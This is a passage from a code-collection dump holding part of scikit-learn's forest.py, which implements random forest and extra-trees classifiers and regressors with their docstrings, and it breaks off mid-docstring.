return json.dumps(self.jsonvars(), sort_keys=True, indent=2)
| gpl-3.0 |
djgagne/scikit-learn | sklearn/ensemble/forest.py | 176 | 62555 | """Forest of trees-based ensemble methods
Those methods include random forests and extremely randomized trees.
The module structure is the following:
- The ``BaseForest`` base class implements a common ``fit`` method for all
the estimators in the module. The ``fit`` method of the base ``Forest``
class calls the ``fit`` method of each sub-estimator on random samples
(with replacement, a.k.a. bootstrap) of the training set.
The init of the sub-estimator is further delegated to the
``BaseEnsemble`` constructor.
- The ``ForestClassifier`` and ``ForestRegressor`` base classes further
implement the prediction logic by computing an average of the predicted
outcomes of the sub-estimators.
- The ``RandomForestClassifier`` and ``RandomForestRegressor`` derived
classes provide the user with concrete implementations of
the forest ensemble method using classical, deterministic
``DecisionTreeClassifier`` and ``DecisionTreeRegressor`` as
sub-estimator implementations.
- The ``ExtraTreesClassifier`` and ``ExtraTreesRegressor`` derived
classes provide the user with concrete implementations of the
forest ensemble method using the extremely randomized trees
``ExtraTreeClassifier`` and ``ExtraTreeRegressor`` as
sub-estimator implementations.
Single and multi-output problems are both handled.
"""
# Authors: Gilles Louppe <g.louppe@gmail.com>
# Brian Holt <bdholt1@gmail.com>
# Joly Arnaud <arnaud.v.joly@gmail.com>
# Fares Hedayati <fares.hedayati@gmail.com>
#
# License: BSD 3 clause
from __future__ import division
import warnings
from warnings import warn
from abc import ABCMeta, abstractmethod
import numpy as np
from scipy.sparse import issparse
from ..base import ClassifierMixin, RegressorMixin
from ..externals.joblib import Parallel, delayed
from ..externals import six
from ..feature_selection.from_model import _LearntSelectorMixin
from ..metrics import r2_score
from ..preprocessing import OneHotEncoder
from ..tree import (DecisionTreeClassifier, DecisionTreeRegressor,
ExtraTreeClassifier, ExtraTreeRegressor)
from ..tree._tree import DTYPE, DOUBLE
from ..utils import check_random_state, check_array, compute_sample_weight
from ..utils.validation import DataConversionWarning, NotFittedError
from .base import BaseEnsemble, _partition_estimators
from ..utils.fixes import bincount
__all__ = ["RandomForestClassifier",
"RandomForestRegressor",
"ExtraTreesClassifier",
"ExtraTreesRegressor",
"RandomTreesEmbedding"]
MAX_INT = np.iinfo(np.int32).max
def _generate_sample_indices(random_state, n_samples):
"""Private function used to _parallel_build_trees function."""
random_instance = check_random_state(random_state)
sample_indices = random_instance.randint(0, n_samples, n_samples)
return sample_indices
def _generate_unsampled_indices(random_state, n_samples):
"""Private function used to forest._set_oob_score fuction."""
sample_indices = _generate_sample_indices(random_state, n_samples)
sample_counts = bincount(sample_indices, minlength=n_samples)
unsampled_mask = sample_counts == 0
indices_range = np.arange(n_samples)
unsampled_indices = indices_range[unsampled_mask]
return unsampled_indices
def _parallel_build_trees(tree, forest, X, y, sample_weight, tree_idx, n_trees,
verbose=0, class_weight=None):
"""Private function used to fit a single tree in parallel."""
if verbose > 1:
print("building tree %d of %d" % (tree_idx + 1, n_trees))
if forest.bootstrap:
n_samples = X.shape[0]
if sample_weight is None:
curr_sample_weight = np.ones((n_samples,), dtype=np.float64)
else:
curr_sample_weight = sample_weight.copy()
indices = _generate_sample_indices(tree.random_state, n_samples)
sample_counts = bincount(indices, minlength=n_samples)
curr_sample_weight *= sample_counts
if class_weight == 'subsample':
with warnings.catch_warnings():
warnings.simplefilter('ignore', DeprecationWarning)
curr_sample_weight *= compute_sample_weight('auto', y, indices)
elif class_weight == 'balanced_subsample':
curr_sample_weight *= compute_sample_weight('balanced', y, indices)
tree.fit(X, y, sample_weight=curr_sample_weight, check_input=False)
else:
tree.fit(X, y, sample_weight=sample_weight, check_input=False)
return tree
def _parallel_helper(obj, methodname, *args, **kwargs):
"""Private helper to workaround Python 2 pickle limitations"""
return getattr(obj, methodname)(*args, **kwargs)
class BaseForest(six.with_metaclass(ABCMeta, BaseEnsemble,
_LearntSelectorMixin)):
"""Base class for forests of trees.
Warning: This class should not be used directly. Use derived classes
instead.
"""
@abstractmethod
def __init__(self,
base_estimator,
n_estimators=10,
estimator_params=tuple(),
bootstrap=False,
oob_score=False,
n_jobs=1,
random_state=None,
verbose=0,
warm_start=False,
class_weight=None):
super(BaseForest, self).__init__(
base_estimator=base_estimator,
n_estimators=n_estimators,
estimator_params=estimator_params)
self.bootstrap = bootstrap
self.oob_score = oob_score
self.n_jobs = n_jobs
self.random_state = random_state
self.verbose = verbose
self.warm_start = warm_start
self.class_weight = class_weight
def apply(self, X):
"""Apply trees in the forest to X, return leaf indices.
Parameters
----------
X : array-like or sparse matrix, shape = [n_samples, n_features]
The input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csr_matrix``.
Returns
-------
X_leaves : array_like, shape = [n_samples, n_estimators]
For each datapoint x in X and for each tree in the forest,
return the index of the leaf x ends up in.
"""
X = self._validate_X_predict(X)
results = Parallel(n_jobs=self.n_jobs, verbose=self.verbose,
backend="threading")(
delayed(_parallel_helper)(tree, 'apply', X, check_input=False)
for tree in self.estimators_)
return np.array(results).T
def fit(self, X, y, sample_weight=None):
"""Build a forest of trees from the training set (X, y).
Parameters
----------
X : array-like or sparse matrix of shape = [n_samples, n_features]
The training input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csc_matrix``.
y : array-like, shape = [n_samples] or [n_samples, n_outputs]
The target values (class labels in classification, real numbers in
regression).
sample_weight : array-like, shape = [n_samples] or None
Sample weights. If None, then samples are equally weighted. Splits
that would create child nodes with net zero or negative weight are
ignored while searching for a split in each node. In the case of
classification, splits are also ignored if they would result in any
single class carrying a negative weight in either child node.
Returns
-------
self : object
Returns self.
"""
# Validate or convert input data
X = check_array(X, dtype=DTYPE, accept_sparse="csc")
if issparse(X):
# Pre-sort indices to avoid that each individual tree of the
# ensemble sorts the indices.
X.sort_indices()
# Remap output
n_samples, self.n_features_ = X.shape
y = np.atleast_1d(y)
if y.ndim == 2 and y.shape[1] == 1:
warn("A column-vector y was passed when a 1d array was"
" expected. Please change the shape of y to "
"(n_samples,), for example using ravel().",
DataConversionWarning, stacklevel=2)
if y.ndim == 1:
# reshape is necessary to preserve the data contiguity against vs
# [:, np.newaxis] that does not.
y = np.reshape(y, (-1, 1))
self.n_outputs_ = y.shape[1]
y, expanded_class_weight = self._validate_y_class_weight(y)
if getattr(y, "dtype", None) != DOUBLE or not y.flags.contiguous:
y = np.ascontiguousarray(y, dtype=DOUBLE)
if expanded_class_weight is not None:
if sample_weight is not None:
sample_weight = sample_weight * expanded_class_weight
else:
sample_weight = expanded_class_weight
# Check parameters
self._validate_estimator()
if not self.bootstrap and self.oob_score:
raise ValueError("Out of bag estimation only available"
" if bootstrap=True")
random_state = check_random_state(self.random_state)
if not self.warm_start:
# Free allocated memory, if any
self.estimators_ = []
n_more_estimators = self.n_estimators - len(self.estimators_)
if n_more_estimators < 0:
raise ValueError('n_estimators=%d must be larger or equal to '
'len(estimators_)=%d when warm_start==True'
% (self.n_estimators, len(self.estimators_)))
elif n_more_estimators == 0:
warn("Warm-start fitting without increasing n_estimators does not "
"fit new trees.")
else:
if self.warm_start and len(self.estimators_) > 0:
# We draw from the random state to get the random state we
# would have got if we hadn't used a warm_start.
random_state.randint(MAX_INT, size=len(self.estimators_))
trees = []
for i in range(n_more_estimators):
tree = self._make_estimator(append=False)
tree.set_params(random_state=random_state.randint(MAX_INT))
trees.append(tree)
# Parallel loop: we use the threading backend as the Cython code
# for fitting the trees is internally releasing the Python GIL
# making threading always more efficient than multiprocessing in
# that case.
trees = Parallel(n_jobs=self.n_jobs, verbose=self.verbose,
backend="threading")(
delayed(_parallel_build_trees)(
t, self, X, y, sample_weight, i, len(trees),
verbose=self.verbose, class_weight=self.class_weight)
for i, t in enumerate(trees))
# Collect newly grown trees
self.estimators_.extend(trees)
if self.oob_score:
self._set_oob_score(X, y)
# Decapsulate classes_ attributes
if hasattr(self, "classes_") and self.n_outputs_ == 1:
self.n_classes_ = self.n_classes_[0]
self.classes_ = self.classes_[0]
return self
@abstractmethod
def _set_oob_score(self, X, y):
"""Calculate out of bag predictions and score."""
def _validate_y_class_weight(self, y):
# Default implementation
return y, None
def _validate_X_predict(self, X):
"""Validate X whenever one tries to predict, apply, predict_proba"""
if self.estimators_ is None or len(self.estimators_) == 0:
raise NotFittedError("Estimator not fitted, "
"call `fit` before exploiting the model.")
return self.estimators_[0]._validate_X_predict(X, check_input=True)
@property
def feature_importances_(self):
"""Return the feature importances (the higher, the more important the
feature).
Returns
-------
feature_importances_ : array, shape = [n_features]
"""
if self.estimators_ is None or len(self.estimators_) == 0:
raise NotFittedError("Estimator not fitted, "
"call `fit` before `feature_importances_`.")
all_importances = Parallel(n_jobs=self.n_jobs,
backend="threading")(
delayed(getattr)(tree, 'feature_importances_')
for tree in self.estimators_)
return sum(all_importances) / len(self.estimators_)
class ForestClassifier(six.with_metaclass(ABCMeta, BaseForest,
ClassifierMixin)):
"""Base class for forest of trees-based classifiers.
Warning: This class should not be used directly. Use derived classes
instead.
"""
@abstractmethod
def __init__(self,
base_estimator,
n_estimators=10,
estimator_params=tuple(),
bootstrap=False,
oob_score=False,
n_jobs=1,
random_state=None,
verbose=0,
warm_start=False,
class_weight=None):
super(ForestClassifier, self).__init__(
base_estimator,
n_estimators=n_estimators,
estimator_params=estimator_params,
bootstrap=bootstrap,
oob_score=oob_score,
n_jobs=n_jobs,
random_state=random_state,
verbose=verbose,
warm_start=warm_start,
class_weight=class_weight)
def _set_oob_score(self, X, y):
"""Compute out-of-bag score"""
X = check_array(X, dtype=DTYPE, accept_sparse='csr')
n_classes_ = self.n_classes_
n_samples = y.shape[0]
oob_decision_function = []
oob_score = 0.0
predictions = []
for k in range(self.n_outputs_):
predictions.append(np.zeros((n_samples, n_classes_[k])))
for estimator in self.estimators_:
unsampled_indices = _generate_unsampled_indices(
estimator.random_state, n_samples)
p_estimator = estimator.predict_proba(X[unsampled_indices, :],
check_input=False)
if self.n_outputs_ == 1:
p_estimator = [p_estimator]
for k in range(self.n_outputs_):
predictions[k][unsampled_indices, :] += p_estimator[k]
for k in range(self.n_outputs_):
if (predictions[k].sum(axis=1) == 0).any():
warn("Some inputs do not have OOB scores. "
"This probably means too few trees were used "
"to compute any reliable oob estimates.")
decision = (predictions[k] /
predictions[k].sum(axis=1)[:, np.newaxis])
oob_decision_function.append(decision)
oob_score += np.mean(y[:, k] ==
np.argmax(predictions[k], axis=1), axis=0)
if self.n_outputs_ == 1:
self.oob_decision_function_ = oob_decision_function[0]
else:
self.oob_decision_function_ = oob_decision_function
self.oob_score_ = oob_score / self.n_outputs_
def _validate_y_class_weight(self, y):
y = np.copy(y)
expanded_class_weight = None
if self.class_weight is not None:
y_original = np.copy(y)
self.classes_ = []
self.n_classes_ = []
y_store_unique_indices = np.zeros(y.shape, dtype=np.int)
for k in range(self.n_outputs_):
classes_k, y_store_unique_indices[:, k] = np.unique(y[:, k], return_inverse=True)
self.classes_.append(classes_k)
self.n_classes_.append(classes_k.shape[0])
y = y_store_unique_indices
if self.class_weight is not None:
valid_presets = ('auto', 'balanced', 'balanced_subsample', 'subsample', 'auto')
if isinstance(self.class_weight, six.string_types):
if self.class_weight not in valid_presets:
raise ValueError('Valid presets for class_weight include '
'"balanced" and "balanced_subsample". Given "%s".'
% self.class_weight)
if self.class_weight == "subsample":
warn("class_weight='subsample' is deprecated and will be removed in 0.18."
" It was replaced by class_weight='balanced_subsample' "
"using the balanced strategy.", DeprecationWarning)
if self.warm_start:
warn('class_weight presets "balanced" or "balanced_subsample" are '
'not recommended for warm_start if the fitted data '
'differs from the full dataset. In order to use '
'"balanced" weights, use compute_class_weight("balanced", '
'classes, y). In place of y you can use a large '
'enough sample of the full training set target to '
'properly estimate the class frequency '
'distributions. Pass the resulting weights as the '
'class_weight parameter.')
if (self.class_weight not in ['subsample', 'balanced_subsample'] or
not self.bootstrap):
if self.class_weight == 'subsample':
class_weight = 'auto'
elif self.class_weight == "balanced_subsample":
class_weight = "balanced"
else:
class_weight = self.class_weight
with warnings.catch_warnings():
if class_weight == "auto":
warnings.simplefilter('ignore', DeprecationWarning)
expanded_class_weight = compute_sample_weight(class_weight,
y_original)
return y, expanded_class_weight
def predict(self, X):
"""Predict class for X.
The predicted class of an input sample is a vote by the trees in
the forest, weighted by their probability estimates. That is,
the predicted class is the one with highest mean probability
estimate across the trees.
Parameters
----------
X : array-like or sparse matrix of shape = [n_samples, n_features]
The input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csr_matrix``.
Returns
-------
y : array of shape = [n_samples] or [n_samples, n_outputs]
The predicted classes.
"""
proba = self.predict_proba(X)
if self.n_outputs_ == 1:
return self.classes_.take(np.argmax(proba, axis=1), axis=0)
else:
n_samples = proba[0].shape[0]
predictions = np.zeros((n_samples, self.n_outputs_))
for k in range(self.n_outputs_):
predictions[:, k] = self.classes_[k].take(np.argmax(proba[k],
axis=1),
axis=0)
return predictions
def predict_proba(self, X):
"""Predict class probabilities for X.
The predicted class probabilities of an input sample is computed as
the mean predicted class probabilities of the trees in the forest. The
class probability of a single tree is the fraction of samples of the same
class in a leaf.
Parameters
----------
X : array-like or sparse matrix of shape = [n_samples, n_features]
The input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csr_matrix``.
Returns
-------
p : array of shape = [n_samples, n_classes], or a list of n_outputs
such arrays if n_outputs > 1.
The class probabilities of the input samples. The order of the
classes corresponds to that in the attribute `classes_`.
"""
# Check data
X = self._validate_X_predict(X)
# Assign chunk of trees to jobs
n_jobs, _, _ = _partition_estimators(self.n_estimators, self.n_jobs)
# Parallel loop
all_proba = Parallel(n_jobs=n_jobs, verbose=self.verbose,
backend="threading")(
delayed(_parallel_helper)(e, 'predict_proba', X,
check_input=False)
for e in self.estimators_)
# Reduce
proba = all_proba[0]
if self.n_outputs_ == 1:
for j in range(1, len(all_proba)):
proba += all_proba[j]
proba /= len(self.estimators_)
else:
for j in range(1, len(all_proba)):
for k in range(self.n_outputs_):
proba[k] += all_proba[j][k]
for k in range(self.n_outputs_):
proba[k] /= self.n_estimators
return proba
def predict_log_proba(self, X):
"""Predict class log-probabilities for X.
The predicted class log-probabilities of an input sample is computed as
the log of the mean predicted class probabilities of the trees in the
forest.
Parameters
----------
X : array-like or sparse matrix of shape = [n_samples, n_features]
The input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csr_matrix``.
Returns
-------
p : array of shape = [n_samples, n_classes], or a list of n_outputs
such arrays if n_outputs > 1.
The class probabilities of the input samples. The order of the
classes corresponds to that in the attribute `classes_`.
"""
proba = self.predict_proba(X)
if self.n_outputs_ == 1:
return np.log(proba)
else:
for k in range(self.n_outputs_):
proba[k] = np.log(proba[k])
return proba
class ForestRegressor(six.with_metaclass(ABCMeta, BaseForest, RegressorMixin)):
"""Base class for forest of trees-based regressors.
Warning: This class should not be used directly. Use derived classes
instead.
"""
@abstractmethod
def __init__(self,
base_estimator,
n_estimators=10,
estimator_params=tuple(),
bootstrap=False,
oob_score=False,
n_jobs=1,
random_state=None,
verbose=0,
warm_start=False):
super(ForestRegressor, self).__init__(
base_estimator,
n_estimators=n_estimators,
estimator_params=estimator_params,
bootstrap=bootstrap,
oob_score=oob_score,
n_jobs=n_jobs,
random_state=random_state,
verbose=verbose,
warm_start=warm_start)
def predict(self, X):
"""Predict regression target for X.
The predicted regression target of an input sample is computed as the
mean predicted regression targets of the trees in the forest.
Parameters
----------
X : array-like or sparse matrix of shape = [n_samples, n_features]
The input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csr_matrix``.
Returns
-------
y : array of shape = [n_samples] or [n_samples, n_outputs]
The predicted values.
"""
# Check data
X = self._validate_X_predict(X)
# Assign chunk of trees to jobs
n_jobs, _, _ = _partition_estimators(self.n_estimators, self.n_jobs)
# Parallel loop
all_y_hat = Parallel(n_jobs=n_jobs, verbose=self.verbose,
backend="threading")(
delayed(_parallel_helper)(e, 'predict', X, check_input=False)
for e in self.estimators_)
# Reduce
y_hat = sum(all_y_hat) / len(self.estimators_)
return y_hat
def _set_oob_score(self, X, y):
"""Compute out-of-bag scores"""
X = check_array(X, dtype=DTYPE, accept_sparse='csr')
n_samples = y.shape[0]
predictions = np.zeros((n_samples, self.n_outputs_))
n_predictions = np.zeros((n_samples, self.n_outputs_))
for estimator in self.estimators_:
unsampled_indices = _generate_unsampled_indices(
estimator.random_state, n_samples)
p_estimator = estimator.predict(
X[unsampled_indices, :], check_input=False)
if self.n_outputs_ == 1:
p_estimator = p_estimator[:, np.newaxis]
predictions[unsampled_indices, :] += p_estimator
n_predictions[unsampled_indices, :] += 1
if (n_predictions == 0).any():
warn("Some inputs do not have OOB scores. "
"This probably means too few trees were used "
"to compute any reliable oob estimates.")
n_predictions[n_predictions == 0] = 1
predictions /= n_predictions
self.oob_prediction_ = predictions
if self.n_outputs_ == 1:
self.oob_prediction_ = \
self.oob_prediction_.reshape((n_samples, ))
self.oob_score_ = 0.0
for k in range(self.n_outputs_):
self.oob_score_ += r2_score(y[:, k],
predictions[:, k])
self.oob_score_ /= self.n_outputs_
class RandomForestClassifier(ForestClassifier):
"""A random forest classifier.
A random forest is a meta estimator that fits a number of decision tree
classifiers on various sub-samples of the dataset and use averaging to
improve the predictive accuracy and control over-fitting.
The sub-sample size is always the same as the original
input sample size but the samples are drawn with replacement if
`bootstrap=True` (default).
Read more in the :ref:`User Guide <forest>`.
Parameters
----------
n_estimators : integer, optional (default=10)
The number of trees in the forest.
criterion : string, optional (default="gini")
The function to measure the quality of a split. Supported criteria are
"gini" for the Gini impurity and "entropy" for the information gain.
Note: this parameter is tree-specific.
max_features : int, float, string or None, optional (default="auto")
The number of features to consider when looking for the best split:
- If int, then consider `max_features` features at each split.
- If float, then `max_features` is a percentage and
`int(max_features * n_features)` features are considered at each
split.
- If "auto", then `max_features=sqrt(n_features)`.
- If "sqrt", then `max_features=sqrt(n_features)` (same as "auto").
- If "log2", then `max_features=log2(n_features)`.
- If None, then `max_features=n_features`.
Note: the search for a split does not stop until at least one
valid partition of the node samples is found, even if it requires to
effectively inspect more than ``max_features`` features.
Note: this parameter is tree-specific.
max_depth : integer or None, optional (default=None)
The maximum depth of the tree. If None, then nodes are expanded until
all leaves are pure or until all leaves contain less than
min_samples_split samples.
Ignored if ``max_leaf_nodes`` is not None.
Note: this parameter is tree-specific.
min_samples_split : integer, optional (default=2)
The minimum number of samples required to split an internal node.
Note: this parameter is tree-specific.
min_samples_leaf : integer, optional (default=1)
The minimum number of samples in newly created leaves. A split is
discarded if after the split, one of the leaves would contain less then
``min_samples_leaf`` samples.
Note: this parameter is tree-specific.
min_weight_fraction_leaf : float, optional (default=0.)
The minimum weighted fraction of the input samples required to be at a
leaf node.
Note: this parameter is tree-specific.
max_leaf_nodes : int or None, optional (default=None)
Grow trees with ``max_leaf_nodes`` in best-first fashion.
Best nodes are defined as relative reduction in impurity.
If None then unlimited number of leaf nodes.
If not None then ``max_depth`` will be ignored.
Note: this parameter is tree-specific.
bootstrap : boolean, optional (default=True)
Whether bootstrap samples are used when building trees.
oob_score : bool
Whether to use out-of-bag samples to estimate
the generalization error.
n_jobs : integer, optional (default=1)
The number of jobs to run in parallel for both `fit` and `predict`.
If -1, then the number of jobs is set to the number of cores.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
verbose : int, optional (default=0)
Controls the verbosity of the tree building process.
warm_start : bool, optional (default=False)
When set to ``True``, reuse the solution of the previous call to fit
and add more estimators to the ensemble, otherwise, just fit a whole
new forest.
class_weight : dict, list of dicts, "balanced", "balanced_subsample" or None, optional
Weights associated with classes in the form ``{class_label: weight}``.
If not given, all classes are supposed to have weight one. For
multi-output problems, a list of dicts can be provided in the same
order as the columns of y.
The "balanced" mode uses the values of y to automatically adjust
weights inversely proportional to class frequencies in the input data
as ``n_samples / (n_classes * np.bincount(y))``
The "balanced_subsample" mode is the same as "balanced" except that weights are
computed based on the bootstrap sample for every tree grown.
For multi-output, the weights of each column of y will be multiplied.
Note that these weights will be multiplied with sample_weight (passed
through the fit method) if sample_weight is specified.
Attributes
----------
estimators_ : list of DecisionTreeClassifier
The collection of fitted sub-estimators.
classes_ : array of shape = [n_classes] or a list of such arrays
The classes labels (single output problem), or a list of arrays of
class labels (multi-output problem).
n_classes_ : int or list
The number of classes (single output problem), or a list containing the
number of classes for each output (multi-output problem).
n_features_ : int
The number of features when ``fit`` is performed.
n_outputs_ : int
The number of outputs when ``fit`` is performed.
feature_importances_ : array of shape = [n_features]
The feature importances (the higher, the more important the feature).
oob_score_ : float
Score of the training dataset obtained using an out-of-bag estimate.
oob_decision_function_ : array of shape = [n_samples, n_classes]
Decision function computed with out-of-bag estimate on the training
set. If n_estimators is small it might be possible that a data point
was never left out during the bootstrap. In this case,
`oob_decision_function_` might contain NaN.
References
----------
.. [1] L. Breiman, "Random Forests", Machine Learning, 45(1), 5-32, 2001.
See also
--------
DecisionTreeClassifier, ExtraTreesClassifier
"""
def __init__(self,
n_estimators=10,
criterion="gini",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features="auto",
max_leaf_nodes=None,
bootstrap=True,
oob_score=False,
n_jobs=1,
random_state=None,
verbose=0,
warm_start=False,
class_weight=None):
super(RandomForestClassifier, self).__init__(
base_estimator=DecisionTreeClassifier(),
n_estimators=n_estimators,
estimator_params=("criterion", "max_depth", "min_samples_split",
"min_samples_leaf", "min_weight_fraction_leaf",
"max_features", "max_leaf_nodes",
"random_state"),
bootstrap=bootstrap,
oob_score=oob_score,
n_jobs=n_jobs,
random_state=random_state,
verbose=verbose,
warm_start=warm_start,
class_weight=class_weight)
self.criterion = criterion
self.max_depth = max_depth
self.min_samples_split = min_samples_split
self.min_samples_leaf = min_samples_leaf
self.min_weight_fraction_leaf = min_weight_fraction_leaf
self.max_features = max_features
self.max_leaf_nodes = max_leaf_nodes
class RandomForestRegressor(ForestRegressor):
"""A random forest regressor.
A random forest is a meta estimator that fits a number of classifying
decision trees on various sub-samples of the dataset and use averaging
to improve the predictive accuracy and control over-fitting.
The sub-sample size is always the same as the original
input sample size but the samples are drawn with replacement if
`bootstrap=True` (default).
Read more in the :ref:`User Guide <forest>`.
Parameters
----------
n_estimators : integer, optional (default=10)
The number of trees in the forest.
criterion : string, optional (default="mse")
The function to measure the quality of a split. The only supported
criterion is "mse" for the mean squared error.
Note: this parameter is tree-specific.
max_features : int, float, string or None, optional (default="auto")
The number of features to consider when looking for the best split:
- If int, then consider `max_features` features at each split.
- If float, then `max_features` is a percentage and
`int(max_features * n_features)` features are considered at each
split.
- If "auto", then `max_features=n_features`.
- If "sqrt", then `max_features=sqrt(n_features)`.
- If "log2", then `max_features=log2(n_features)`.
- If None, then `max_features=n_features`.
Note: the search for a split does not stop until at least one
valid partition of the node samples is found, even if it requires to
effectively inspect more than ``max_features`` features.
Note: this parameter is tree-specific.
max_depth : integer or None, optional (default=None)
The maximum depth of the tree. If None, then nodes are expanded until
all leaves are pure or until all leaves contain less than
min_samples_split samples.
Ignored if ``max_leaf_nodes`` is not None.
Note: this parameter is tree-specific.
min_samples_split : integer, optional (default=2)
The minimum number of samples required to split an internal node.
Note: this parameter is tree-specific.
min_samples_leaf : integer, optional (default=1)
The minimum number of samples in newly created leaves. A split is
discarded if after the split, one of the leaves would contain less then
``min_samples_leaf`` samples.
Note: this parameter is tree-specific.
min_weight_fraction_leaf : float, optional (default=0.)
The minimum weighted fraction of the input samples required to be at a
leaf node.
Note: this parameter is tree-specific.
max_leaf_nodes : int or None, optional (default=None)
Grow trees with ``max_leaf_nodes`` in best-first fashion.
Best nodes are defined as relative reduction in impurity.
If None then unlimited number of leaf nodes.
If not None then ``max_depth`` will be ignored.
Note: this parameter is tree-specific.
bootstrap : boolean, optional (default=True)
Whether bootstrap samples are used when building trees.
oob_score : bool
whether to use out-of-bag samples to estimate
the generalization error.
n_jobs : integer, optional (default=1)
The number of jobs to run in parallel for both `fit` and `predict`.
If -1, then the number of jobs is set to the number of cores.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
verbose : int, optional (default=0)
Controls the verbosity of the tree building process.
warm_start : bool, optional (default=False)
When set to ``True``, reuse the solution of the previous call to fit
and add more estimators to the ensemble, otherwise, just fit a whole
new forest.
Attributes
----------
estimators_ : list of DecisionTreeRegressor
The collection of fitted sub-estimators.
feature_importances_ : array of shape = [n_features]
The feature importances (the higher, the more important the feature).
n_features_ : int
The number of features when ``fit`` is performed.
n_outputs_ : int
The number of outputs when ``fit`` is performed.
oob_score_ : float
Score of the training dataset obtained using an out-of-bag estimate.
oob_prediction_ : array of shape = [n_samples]
Prediction computed with out-of-bag estimate on the training set.
References
----------
.. [1] L. Breiman, "Random Forests", Machine Learning, 45(1), 5-32, 2001.
See also
--------
DecisionTreeRegressor, ExtraTreesRegressor
"""
def __init__(self,
n_estimators=10,
criterion="mse",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features="auto",
max_leaf_nodes=None,
bootstrap=True,
oob_score=False,
n_jobs=1,
random_state=None,
verbose=0,
warm_start=False):
super(RandomForestRegressor, self).__init__(
base_estimator=DecisionTreeRegressor(),
n_estimators=n_estimators,
estimator_params=("criterion", "max_depth", "min_samples_split",
"min_samples_leaf", "min_weight_fraction_leaf",
"max_features", "max_leaf_nodes",
"random_state"),
bootstrap=bootstrap,
oob_score=oob_score,
n_jobs=n_jobs,
random_state=random_state,
verbose=verbose,
warm_start=warm_start)
self.criterion = criterion
self.max_depth = max_depth
self.min_samples_split = min_samples_split
self.min_samples_leaf = min_samples_leaf
self.min_weight_fraction_leaf = min_weight_fraction_leaf
self.max_features = max_features
self.max_leaf_nodes = max_leaf_nodes
class ExtraTreesClassifier(ForestClassifier):
"""An extra-trees classifier.
This class implements a meta estimator that fits a number of
randomized decision trees (a.k.a. extra-trees) on various sub-samples
of the dataset and use averaging to improve the predictive accuracy
and control over-fitting.
Read more in the :ref:`User Guide <forest>`.
Parameters
----------
n_estimators : integer, optional (default=10)
The number of trees in the forest.
criterion : string, optional (default="gini")
The function to measure the quality of a split. Supported criteria are
"gini" for the Gini impurity and "entropy" for the information gain.
Note: this parameter is tree-specific.
max_features : int, float, string or None, optional (default="auto")
The number of features to consider when looking for the best split:
- If int, then consider `max_features` features at each split.
- If float, then `max_features` is a percentage and
`int(max_features * n_features)` features are considered at each
split.
- If "auto", then `max_features=sqrt(n_features)`.
- If "sqrt", then `max_features=sqrt(n_features)`.
- If "log2", then `max_features=log2(n_features)`.
- If None, then `max_features=n_features`.
Note: the search for a split does not stop until at least one
valid partition of the node samples is found, even if it requires to
effectively inspect more than ``max_features`` features.
Note: this parameter is tree-specific.
max_depth : integer or None, optional (default=None)
The maximum depth of the tree. If None, then nodes are expanded until
all leaves are pure or until all leaves contain less than
min_samples_split samples.
Ignored if ``max_leaf_nodes`` is not None.
Note: this parameter is tree-specific.
min_samples_split : integer, optional (default=2)
The minimum number of samples required to split an internal node.
Note: this parameter is tree-specific.
min_samples_leaf : integer, optional (default=1)
The minimum number of samples in newly created leaves. A split is
discarded if after the split, one of the leaves would contain less then
``min_samples_leaf`` samples.
Note: this parameter is tree-specific.
min_weight_fraction_leaf : float, optional (default=0.)
The minimum weighted fraction of the input samples required to be at a
leaf node.
Note: this parameter is tree-specific.
max_leaf_nodes : int or None, optional (default=None)
Grow trees with ``max_leaf_nodes`` in best-first fashion.
Best nodes are defined as relative reduction in impurity.
If None then unlimited number of leaf nodes.
If not None then ``max_depth`` will be ignored.
Note: this parameter is tree-specific.
bootstrap : boolean, optional (default=False)
Whether bootstrap samples are used when building trees.
oob_score : bool
Whether to use out-of-bag samples to estimate
the generalization error.
n_jobs : integer, optional (default=1)
The number of jobs to run in parallel for both `fit` and `predict`.
If -1, then the number of jobs is set to the number of cores.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
verbose : int, optional (default=0)
Controls the verbosity of the tree building process.
warm_start : bool, optional (default=False)
When set to ``True``, reuse the solution of the previous call to fit
and add more estimators to the ensemble, otherwise, just fit a whole
new forest.
class_weight : dict, list of dicts, "balanced", "balanced_subsample" or None, optional
Weights associated with classes in the form ``{class_label: weight}``.
If not given, all classes are supposed to have weight one. For
multi-output problems, a list of dicts can be provided in the same
order as the columns of y.
The "balanced" mode uses the values of y to automatically adjust
weights inversely proportional to class frequencies in the input data
as ``n_samples / (n_classes * np.bincount(y))``
The "balanced_subsample" mode is the same as "balanced" except that weights are
computed based on the bootstrap sample for every tree grown.
For multi-output, the weights of each column of y will be multiplied.
Note that these weights will be multiplied with sample_weight (passed
through the fit method) if sample_weight is specified.
Attributes
----------
estimators_ : list of DecisionTreeClassifier
The collection of fitted sub-estimators.
classes_ : array of shape = [n_classes] or a list of such arrays
The classes labels (single output problem), or a list of arrays of
class labels (multi-output problem).
n_classes_ : int or list
The number of classes (single output problem), or a list containing the
number of classes for each output (multi-output problem).
feature_importances_ : array of shape = [n_features]
The feature importances (the higher, the more important the feature).
n_features_ : int
The number of features when ``fit`` is performed.
n_outputs_ : int
The number of outputs when ``fit`` is performed.
oob_score_ : float
Score of the training dataset obtained using an out-of-bag estimate.
oob_decision_function_ : array of shape = [n_samples, n_classes]
Decision function computed with out-of-bag estimate on the training
set. If n_estimators is small it might be possible that a data point
was never left out during the bootstrap. In this case,
